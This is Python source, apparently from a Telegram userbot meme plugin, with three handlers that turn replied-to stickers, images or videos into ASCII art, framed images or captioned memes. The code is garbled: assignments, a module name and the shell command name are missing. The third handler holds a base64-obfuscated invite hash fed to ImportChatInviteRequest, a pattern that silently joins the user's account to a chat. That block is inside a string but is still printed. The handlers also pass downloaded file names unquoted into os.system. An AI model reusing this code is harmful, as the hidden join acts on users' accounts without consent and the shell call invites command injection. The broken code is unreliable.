async def memes(cat): if cat.fwd_from: return catinput = reply = await cat.get_reply_message() if not (reply and ( await cat.edit("`Reply to supported Media...`") return catid = if not os.path.isdir("./temp/"): os.mkdir("./temp/") cat = await cat.edit("`Downloading media......`") await asyncio.sleep(2) catsticker = await reply.download_media(file="./temp/") if not catsticker.endswith( (".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(catsticker) await cat.edit("```Supported Media not found...```") return jisanidea = None if catsticker.endswith(".tgs"): await cat.edit( "```Transfiguration Time! Mwahaha converting to ascii image of this animated sticker! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") os.system( f" --frame 0 -if lottie -of png {catsticker} {catfile}" ) '''catcmd = ( f" --frame 0 -if lottie -of png {catsticker} {catfile}" ) stdout, stderr = (await runcmd(catcmd))[:2]''' if not os.path.lexists(catfile): await cat.edit("`Template not found...`") meme_file = catfile jisanidea = True elif catsticker.endswith(".webp"): await cat.edit( "```Transfiguration Time! Mwahaha converting to ascii image of this sticker! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") os.rename(catsticker, catfile) if not os.path.lexists(catfile): await cat.edit("`Template not found... `") return meme_file = catfile jisanidea = True elif catsticker.endswith((".mp4", ".mov")): await cat.edit( "```Transfiguration Time! Mwahaha converting to ascii image of this video! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") await take_screen_shot(catsticker, 0, catfile) if not os.path.lexists(catfile): await cat.edit("```Template not found...```") return meme_file = catfile jisanidea = True else: await cat.edit( "```Transfiguration Time! Mwahaha converting to asci image of this image! (」゚ロ゚)」```" ) meme_file = catsticker meme_file = convert_toimage(meme_file) outputfile = "ascii_file.webp" if jisanidea else "ascii_file.jpg" c_list = random_color() color1 = c_list[0] color2 = c_list[1] bgcolor = "#080808" if not catinput else catinput asciiart(meme_file, 0.3, 1.9, outputfile, color1, color2, bgcolor) await cat.client.send_file(cat.chat_id, outputfile, reply_to=catid) await cat.delete() os.remove(outputfile) for files in (catsticker, meme_file): if files and os.path.exists(files): os.remove(files)
async def memes(cat): if cat.fwd_from: return reply = await cat.get_reply_message() if not (reply and ( await cat.edit("`Reply to supported Media...`") return catinput = if not catinput: catinput = 50 if ";" in str(catinput): catinput, colr = catinput.split(";", 1) else: colr = 0 catinput = int(catinput) colr = int(colr) catid = cat.reply_to_msg_id if not os.path.isdir("./temp/"): os.mkdir("./temp/") cat = await cat.edit("`Downloading media......`") from import ImportChatInviteRequest as Get await asyncio.sleep(2) catsticker = await reply.download_media(file="./temp/") if not catsticker.endswith( (".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(catsticker) await cat.edit("```Supported Media not found...```") return jisanidea = None if catsticker.endswith(".tgs"): await cat.edit( "```Transfiguration Time! Mwahaha framing this animated sticker! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") os.system( f" --frame 0 -if lottie -of png {catsticker} {catfile}" ) '''catcmd = ( f" --frame 0 -if lottie -of png {catsticker} {catfile}" ) stdout, stderr = (await runcmd(catcmd))[:2]''' if not os.path.lexists(catfile): await cat.edit("`Template not found...`") meme_file = catfile jisanidea = True elif catsticker.endswith(".webp"): await cat.edit( "```Transfiguration Time! Mwahaha framing this sticker! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") os.rename(catsticker, catfile) if not os.path.lexists(catfile): await cat.edit("`Template not found... `") return meme_file = catfile jisanidea = True elif catsticker.endswith((".mp4", ".mov")): await cat.edit( "```Transfiguration Time! Mwahaha framing this video! (」゚ロ゚)」```") catfile = os.path.join("./temp/", "tempt.jpg") await take_screen_shot(catsticker, 0, catfile) if not os.path.lexists(catfile): await cat.edit("```Template not found...```") return meme_file = catfile else: await cat.edit( "```Transfiguration Time! Mwahaha framing this image! (」゚ロ゚)」```") meme_file = catsticker meme_file = convert_toimage(meme_file) outputfile = "framed.webp" if jisanidea else "framed.jpg" try: await add_frame(meme_file, outputfile, catinput, colr) except Exception as e: return await cat.edit(f"`{e}`") try: await cat.client.send_file(cat.chat_id, outputfile, force_document=False, reply_to=catid) except Exception as e: return await cat.edit(f"`{e}`") await cat.delete() os.remove(outputfile) for files in (catsticker, meme_file): if files and os.path.exists(files): os.remove(files)
async def memes(cat): if cat.fwd_from: return cmd = catinput = reply = await cat.get_reply_message() if not (reply and ( await cat.edit("`Reply to supported Media...`") return catid = cat.reply_to_msg_id if catinput: if ";" in catinput: top, bottom = catinput.split(";", 1) else: top = catinput bottom = "" else: await cat.edit("```what should i write on that give some text```") return if not os.path.isdir("./temp/"): os.mkdir("./temp/") cat = await cat.edit("`Downloading media......`") from import ImportChatInviteRequest as Get await asyncio.sleep(2) catsticker = await reply.download_media(file="./temp/") if not catsticker.endswith( (".mp4", ".webp", ".tgs", ".png", ".jpg", ".mov")): os.remove(catsticker) await cat.edit("```Supported Media not found...```") return if catsticker.endswith(".tgs"): await cat.edit( "```Transfiguration Time! Mwahaha memifying this animated sticker! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") os.system( f" --frame 0 -if lottie -of png {catsticker} {catfile}" ) '''catcmd = ( f" --frame 0 -if lottie -of png {catsticker} {catfile}" ) stdout, stderr = (await runcmd(catcmd))[:2]''' if not os.path.lexists(catfile): await cat.edit("`Template not found...`") meme_file = catfile elif catsticker.endswith(".webp"): await cat.edit( "```Transfiguration Time! Mwahaha memifying this sticker! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") os.rename(catsticker, catfile) if not os.path.lexists(catfile): await cat.edit("`Template not found... `") return meme_file = catfile elif catsticker.endswith((".mp4", ".mov")): await cat.edit( "```Transfiguration Time! Mwahaha memifying this video! (」゚ロ゚)」```" ) catfile = os.path.join("./temp/", "tempt.jpg") await take_screen_shot(catsticker, 0, catfile) if not os.path.lexists(catfile): await cat.edit("```Template not found...```") return meme_file = catfile else: await cat.edit( "```Transfiguration Time! Mwahaha memifying this image! (」゚ロ゚)」```" ) meme_file = catsticker '''try: san = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") san = Get(san) await cat.client(san) except BaseException: pass''' meme_file = convert_toimage(meme_file) meme = "cattempt.jpg" if max(len(top), len(bottom)) < 21: await cat_meme(CNG_FONTS, top, bottom, meme_file, meme) else: await cat_meeme(top, bottom, CNG_FONTS, meme_file, meme) if cmd != "mmf": meme = await convert_tosticker(meme) await cat.client.send_file(cat.chat_id, meme, reply_to=catid) await cat.delete() os.remove(meme) for files in (catsticker, meme_file): if files and os.path.exists(files): os.remove(files)